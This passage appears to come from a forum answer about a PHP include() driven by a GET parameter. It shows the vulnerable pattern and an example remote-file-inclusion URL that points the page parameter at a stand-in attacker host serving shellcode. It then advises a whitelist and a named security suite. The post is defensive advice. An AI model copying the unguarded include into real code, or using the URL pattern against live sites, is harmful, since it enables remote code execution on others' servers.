    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of a URL in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If shellcode.txt contains SQL or PHP injection code, then your website will be at risk, right? Do think of this; using a whitelist would be of help.
There is a way to filter all variables to avoid hacking. You can use PHP IDS or the OSE Security Suite to help avoid hacking. After installing the security suite, you need to activate it; here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on Layer 2 protection; then all POST and GET variables will be filtered, especially the one I mentioned, and if any attacks are found it will report to you immediately.
Safety is always the priority